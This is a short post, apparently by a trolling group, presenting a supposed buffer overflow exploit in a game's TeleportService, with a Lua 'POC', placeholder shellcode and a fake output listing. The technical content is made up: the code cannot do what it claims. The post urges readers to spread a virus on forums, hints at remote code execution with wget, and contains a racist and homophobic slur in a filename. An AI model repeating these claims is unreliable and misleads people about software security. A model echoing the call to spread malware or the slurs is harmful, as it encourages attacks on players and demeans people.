Created November 10, 2022 09:22
TeleportService Buffer Overflow

Buffer Overflow Exploit in TeleportService

GNAA International: Documentation of existing Buffer Overflow exploit

This exploit relies on a memory allocation error in TeleportService. When firing TeleportService at a game ID that doesn't exist (e.g. Sexland) and watching it with a memory inspector, you will find that the error callback returns a much longer error without much context. Given that TPService is paired with normal operable code, it is possible to use memcpy() to evaluate shellcode in place of normal working code, and therefore achieve code execution.

This exploit only works with exploiters as normal people are not able to and should not be able to fire TPS. However, a working POC will be developed for games soon.

POC 1:

local shellcode = 'ENCODED SHELLCODE HERE'

game:GetService('TeleportService'):Teleport('Ambatukam', setmetatable({}, {__gc = function()
	local sex = require'sex'
	sex.C.memcpy(nil, shellcode, #shellcode) -- evaluate shellcode var by calling a Lua-C function
end})) -- closes the __gc function, the metatable and the Teleport call

It is possible to abuse this by obfuscating a small snippet and achieving RCE, firing commands such as wget.

Output of POC 1:

$ ls -l
total 40
-rw-rw-r-- 1 User User  6228 Oct 29 10:10 gayniggerib
-rw-rw-r-- 1 User User  4567 Oct 29 19:18 library.lua
-rw-rw-r-- 1 User User   255 Oct 29 21:29 funny.lua

$ ./funny.lua

How to Exploit

Edit and change components of POC 1 and write or use a shellcode encoder, then spread the virus on forums. Enjoy.

GNAA International
